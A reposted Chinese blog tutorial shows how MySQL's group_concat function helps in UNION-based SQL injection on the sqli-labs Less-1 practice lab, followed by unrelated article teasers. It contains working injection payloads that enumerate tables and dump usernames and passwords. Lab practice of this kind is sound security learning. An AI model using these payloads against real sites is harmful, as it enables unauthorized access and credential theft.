sql注入利用group_concat函数

sql注入利用group_concat函数

pingmian/2025/4/26 4:19:09/文章来源:https://blog.csdn.net/m0_70638961/article/details/139266675

1.group_concat函数的作用：

首先根据group by指定的列进行分组，将同一组的列显示出来，并且用分隔符分隔。

2.group_concat运用

这里我使用的是sqllab-less1，通过对数据库的查询，我们发现数据库表名，列名，等数据在information_schema数据库中。

就可以通过以下语句注入

?id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security'--+

但是这样只能回显某一个表，这时就可以使用group_concat函数把security的每一个表回显出来

同理可以查询列名。

当库名、表名、列名都查到了之后，选择最有用的回显出来就成功的注入了。

这里我们选择users表回显出用户名username和密码password。

?id=-1' union select 1,group_concat(username,0x3e,password),3 from users--+

当然这是最简单的注入。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/pingmian/17774.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

qmt量化交易策略小白学习笔记第1期【qmt如何获取股票概况？】

qmt量化交易策略小白学习笔记第1期【qmt如何获取股票概况？】

#获取股票概况包含股票的上市时间、退市时间、代码、名称、是否是ST等。 #获取合约基础信息数据该信息每交易日9点更新调用方法大蟒 from xtquant import xtdata xtdata.get_instrument_detail(stock_code) 参数名称类型描述 stock_code string 合约代码返…

阅读更多...

手写电纸书天花板，阅读办公新体验 | 汉王手写电纸本 N10 2024 版使用评测

手写电纸书天花板，阅读办公新体验 | 汉王手写电纸本 N10 2024 版使用评测

手写电纸书天花板，阅读办公新体验 | 汉王手写电纸本 N10 2024 版使用评测请问如果说到电纸书，你的认知还只是Kindle吗？然而遗憾的是，Kindle亦是过去，智能才是未来。哈喽小伙伴们好，我是Stark-C~&#x…

阅读更多...

Mysql基础学习：mysql8 JSON字段查询操作

Mysql基础学习：mysql8 JSON字段查询操作

文章目录一、查询JSON中某个属性值为XXX的数据量1、方式一2、方式二二、查询的JSON中的value并去除双引号一、查询JSON中某个属性值为XXX的数据量 1、方式一 select count(*)from table_namewhere JSON_CONTAINS(json-> $.filed1, "xxx")or JSON_CONTAINS(jso…

阅读更多...

蓝桥杯嵌入式国赛笔记(4):多路AD采集

蓝桥杯嵌入式国赛笔记(4):多路AD采集

1、前言蓝桥杯的国赛会遇到多路AD采集的情况，这时候之前的单路采集的方式就不可用了，下面介绍两种多路采集的方式。以第13届国赛为例 2、方法一（配置通道） 2.1 使用CubeMx配置设置IN13与IN17为Single-ended 在Parameter S…

阅读更多...

Python—面向对象小解(2)

Python—面向对象小解(2)

一、面向对象开发的基本使用根据需求定义类关键字class 属性变量方法函数默认函数中必须有个self参数 self(自己)代表当前对象如何将一项物品放入一个空间内? # 类的定义创建 class itcast:# 指定属性name 大象container 冰箱# 指定数据的处理方法def open_c…

阅读更多...

网络工程师：网络可靠性技术

网络工程师：网络可靠性技术

一、可靠性平均故障间隔时间MTBF(Mean Time Between Failure)和平均修复时间MTTR(Mean Time to Repair)这两个指标来评价系统的可靠性。 1、平均故障间隔时间MTBF MTBF是指一个系统无故障运行平均时间，通常以小时为单位。MTBF越大可靠性越高。 2、平均修复时间MTTR…

阅读更多...

内网安全-隧道搭建穿透上线内网穿透-nps自定义上线内网渗透-Linux上线-cs上线Linux主机

内网安全-隧道搭建穿透上线内网穿透-nps自定义上线内网渗透-Linux上线-cs上线Linux主机

目录内网安全-隧道搭建&穿透上线内网穿透-nps-自定义-上线NPS工具介绍搭建过程 nps原理介绍MSF上线CS上线内网渗透-Linux上线-cs上线Linux主机1.下载插件2.导入插件模块3.配置监听器4.服务端配置5.配置C2监听器并生成木马6.执行木马内网安全-隧道搭建&穿透上线内网…

阅读更多...

2024年新算法-秘书鸟优化算法(SBOA)优化BP神经网络回归预测

2024年新算法-秘书鸟优化算法(SBOA)优化BP神经网络回归预测

2024年新算法-秘书鸟优化算法(SBOA)优化BP神经网络回归预测亮点： 输出多个评价指标：R2，RMSE，MSE，MAPE和MAE 满足需求，分开运行和对比的都有对应的主函数：main_BP, main_SBOA, main_BPvsBP_SB…

阅读更多...

vue3 excel 文件导出

vue3 excel 文件导出

//文件导出在index.ts 中 export function downloadHandle(url: string,params?:object, filename?: string, method: string GET){ try { downloadLoadingInstance ElLoading.service({ text: "正在生成下载数据，请稍候", background: "rgba…

阅读更多...

【计算机视觉 Mamba】MambaOut: Do We Really Need Mamba for Vision?

【计算机视觉 Mamba】MambaOut: Do We Really Need Mamba for Vision?

MambaOut: Do We Really Need Mamba for Vision? 在视觉任务上我们需要Mamba吗? 论文地址代码地址知乎解读：王牌飞行员申请出战！ 知乎解读：Mamba 模型解读 (一)：MambaOut：在视觉任务中，我们真的需要 …

阅读更多...

Tessy学习系列（一）：软件测试的概念介绍与常见的测试策略

Tessy学习系列（一）：软件测试的概念介绍与常见的测试策略

相关内容参考自《软件测试的艺术》一、软件测试的概念所谓软件测试，就是一个过程或一系列过程．用来确认计算机代码完成了其应该完成的功能不执行其不该有的操作。软件应当是可预测且稳定的，不会给用户带来意外惊奇。软件测试的作用主要体…

阅读更多...

Langchain-Chatchat之pdf转markdown格式

Langchain-Chatchat之pdf转markdown格式

文章目录背景开发环境loader文本解析步骤markdown格式的文本为什么选择markdown格式测试markdown格式提取表格原pdf表格markdown格式的表格测试markdown格式的知识库运行项目修改文件加载器loader 其他问题运行项目报错查看系统当前的max_user_watches修改sysctl.conf配置图…

阅读更多...

AWS迁移与传输之AMS/MGN

AWS迁移与传输之AMS/MGN

AWS Application Migration Service（AWS Application Migration Service简称为AWS MGN，MGN是migration的缩写。）是一项全面的迁移服务，旨在帮助企业将其本地服务器和虚拟机迁移到云端，包括AWS和VMware Cloud on AWS。 …

阅读更多...

OrangePi AIpro初体验：开启嵌入式开发之旅

OrangePi AIpro初体验：开启嵌入式开发之旅

概述随着物联网和智能设备时代的到来，单板电脑因其独特的优势成为创新项目和教育实践的重要工具。在众多单板电脑中，香橙派以其出色的性能和亲民的价格，十分吸引博主这初涉嵌入式开发的新手。博主有幸被CSDN邀请对OrangePi AIpro进行测评。…

阅读更多...

Netty-选择器-监听

Netty-选择器-监听

归档 GitHub: Netty-选择器-监听介绍参考 NioEventLoop 类结构：基础类介绍-NioEventLoop 主要逻辑为：死循环监听 selector总结： 创建的线程是 FastThreadLocalThread 实例原理 io.netty.channel.nio.NioEventLoop /*** NIO 事件轮循 …

阅读更多...

vivado设置Vscode为默认编辑器

vivado设置Vscode为默认编辑器

D:\vscode\Microsoft VS Code\Code.exe -g [file name]:[line number]

阅读更多...

鸿蒙ArkUI-X跨平台开发：【资源分类与访问】

鸿蒙ArkUI-X跨平台开发：【资源分类与访问】

资源分类与访问应用开发过程中，经常需要用到颜色、字体、间距、图片等资源，在不同的设备或配置中，这些资源的值可能不同。应用资源：借助资源文件能力，开发者在应用中自定义资源，自行管理这些资源在不同…

阅读更多...

话术巧妙分隔沟通效果更佳看看这个小技巧

话术巧妙分隔沟通效果更佳看看这个小技巧

客服回复客户咨询，如果遇到比较复杂的问题，经常会有大段的文字回复，用聊天宝的分段符功能，在需要分段的地方点击右上角的“插入分隔符”，就可以在指定位置分段，实现多段发送的目的。前言客服回复客户咨询…

阅读更多...

干冰清洗机的清洗原理及应用

干冰清洗机的清洗原理及应用

干冰清洗机的清洗原理及应用可以详细阐述如下： 一、清洗原理干冰清洗机的清洗原理主要基于干冰的低温冷冻作用。干冰在常温下会迅速升华，吸收大量的热量，使周围的温度迅速降低。当干冰颗粒通过特殊的干冰清洗机喷射到清洗物体表面时&#…

阅读更多...

系统架构设计师【第1章】: 绪论 (核心总结)

系统架构设计师【第1章】: 绪论 (核心总结)

文章目录 1.1　系统架构概述1.1.1　系统架构的定义及发展历程1.1.2　软件架构的常用分类及建模方法1.1.3　软件架构的应用场景1.1.4　软件架构的发展未来 1.2　系统架构设计师概述1.2.1　架构设计师的定义、职责和任务1.2.2　架构设计师应具备的专业素质1.2.3　架构设计师的知识…

阅读更多...

最新文章